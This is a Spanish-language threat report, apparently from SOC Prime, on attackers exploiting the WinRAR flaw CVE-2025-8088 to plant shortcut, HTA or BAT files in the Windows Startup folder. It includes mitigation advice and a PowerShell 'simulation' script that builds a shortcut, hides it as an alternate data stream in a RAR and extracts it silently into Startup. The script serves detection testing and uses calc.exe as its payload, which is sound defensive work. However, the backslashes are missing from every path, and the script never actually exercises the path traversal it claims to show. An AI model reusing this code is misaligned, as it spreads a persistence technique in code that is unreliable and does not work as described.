SOC Prime Bias: Crítico

28 Jan 2026 13:07 UTC

CVE-2025-8088: Actores de Amenazas Diversos Explotan una Falla Crítica en WinRAR

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
CVE-2025-8088: Actores de Amenazas Diversos Explotan una Falla Crítica en WinRAR
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

El Grupo de Inteligencia de Amenazas de Google informa sobre una explotación generalizada de CVE-2025-8088, una vulnerabilidad de recorrido de ruta de alta severidad en WinRAR. Los adversarios lo utilizan para colocar archivos maliciosos en la carpeta de Inicio de Windows para obtener persistencia. Tanto los grupos patrocinados por el estado como los motivados financieramente están aprovechando la explotación para entregar RATs, descargadores y cargas posteriores. El informe comparte indicadores además de orientación para la detección y mitigación.

Investigación

Los investigadores vincularon a varios actores—UNC4895, APT44, Turla y un grupo con sede en la RPC—a archivos RAR personalizados que abusan de Corrientes de Datos Alternativas (ADS) para soltar archivos LNK, HTA o BAT en Inicio. Algunos archivos archivados prepararon manejadores LNK que lanzan HTA o BAT al iniciar sesión. Las familias de malware observadas incluyen NESTPACKER, POISONIVY, XWorm y AsyncRAT. Infraestructura compartida y código de explotación reutilizado apareció en campañas dirigidas a Ucrania y otras regiones.

Mitigación

Actualizar WinRAR a 7.13+ y aplicar listas de aplicaciones permitidas. Reducir la exposición a ADS donde sea posible y monitorear la carpeta de Inicio en busca de nuevos archivos LNK, HTA, BAT o scripts. Aplicar Google Safe Browsing y controles de seguridad de correo electrónico para detener archivos maliciosos temprano.

Respuesta

Detectar la creación de archivos en el camino de Inicio ligada a la extracción de RAR, especialmente accesos directos y scripts. Correlacionar alertas con nombres de archivos y hashes conocidos, poner en cuarentena los hosts afectados, confirmar la familia de malware, y eliminar la persistencia de Inicio durante la respuesta al incidente.

Flujo de Ataque

Ejecución de Simulación

Prerrequisito: La Verificación Previa de Telemetría y Línea de Base debe haber pasado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y narrativas DEBEN reflejar directamente los TTP identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección.

  • Narrativa del Ataque y Comandos:
    Un atacante elabora un archivo RAR malicioso que incrusta un acceso directo de Windows (malicious.lnk) como una Corriente de Datos Alternativa adjunta a un PDF de apariencia inocente (innocuous.pdf). Aprovechando CVE‑2025‑8088, el atacante sabe que WinRAR extraerá el ADS directamente en la ruta de destino sin sanitizar el nombre de la corriente. El archivo es entregado a la máquina de la víctima (por ejemplo, a través de phishing). El atacante luego ejecuta WinRAR en modo silencioso para extraer la carga directamente en la carpeta de Inicio del usuario actual, logrando persistencia.

    1. Crear la carga LNK maliciosa (un acceso directo que lanza cmd.exe /c calc.exe).
    2. Adjuntar el LNK como un ADS a innocuous.pdf dentro del RAR.
    3. Entregar el RAR a la víctima.
    4. Ejecutar extracción de WinRAR en el directorio de Inicio.
  • Script de Prueba de Regresión:

    # --------------------------------------------------------------
    # Script de PowerShell para simular persistencia LNK-ADS CVE‑2025‑8088
    # --------------------------------------------------------------
    
    # 1. Variables
    $tempDir      = "$envTEMPLNK_ADS_Test"
    $pdfPath      = "$tempDirinnocuous.pdf"
    $lnkPath      = "$tempDirmalicious.lnk"
    $rarPath      = "$tempDirmalicious.rar"
    $startupPath  = "$envAPPDATAMicrosoftWindowsStart MenuProgramsStartup"
    
    # Asegurar un espacio de trabajo limpio
    Remove-Item -Recurse -Force $tempDir -ErrorAction SilentlyContinue
    New-Item -ItemType Directory -Path $tempDir | Out-Null
    
    # 2. Crear un PDF ficticio (archivo vacío funciona para demostración de ADS)
    New-Item -ItemType File -Path $pdfPath | Out-Null
    
    # 3. Crear LNK malicioso apuntando a calculadora
    $ws = New-Object -ComObject WScript.Shell
    $shortcut = $ws.CreateShortcut($lnkPath)
    $shortcut.TargetPath = "calc.exe"
    $shortcut.WindowStyle = 1
    $shortcut.Save()
    
    # 4. Empaquetar PDF y adjuntar LNK como ADS usando CLI de WinRAR
    #    La sintaxis crea un ADS llamado "malicious.lnk" adjunto al PDF.
    & "C:Program FilesWinRARWinRAR.exe" a -df $rarPath $pdfPath "$lnkPath:malicious.lnk"
    
    # 5. Extraer RAR directamente a la carpeta de Inicio (modo silencioso)
    & "C:Program FilesWinRARWinRAR.exe" x -inul $rarPath $startupPath
    
    # 6. Verificar que el LNK ahora exista en Inicio (será visible como un .lnk regular)
    $extractedLnk = Join-Path $startupPath "malicious.lnk"
    if (Test-Path $extractedLnk) {
        Write-Host "[+] Acceso directo malicioso desplegado en Inicio: $extractedLnk"
    } else {
        Write-Error "[-] Acceso directo no encontrado – la extracción puede haber fallado."
    }
    
    # --------------------------------------------------------------
    # Fin del script
    # --------------------------------------------------------------
  • Comandos de Limpieza:

    # Eliminar el acceso directo malicioso de Inicio
    $lnk = "$envAPPDATAMicrosoftWindowsStart MenuProgramsStartupmalicious.lnk"
    if (Test-Path $lnk) { Remove-Item -Force $lnk }
    
    # Eliminar archivos y directorios temporales
    $temp = "$envTEMPLNK_ADS_Test"
    if (Test-Path $temp) { Remove-Item -Recurse -Force $temp }

Fin del Informe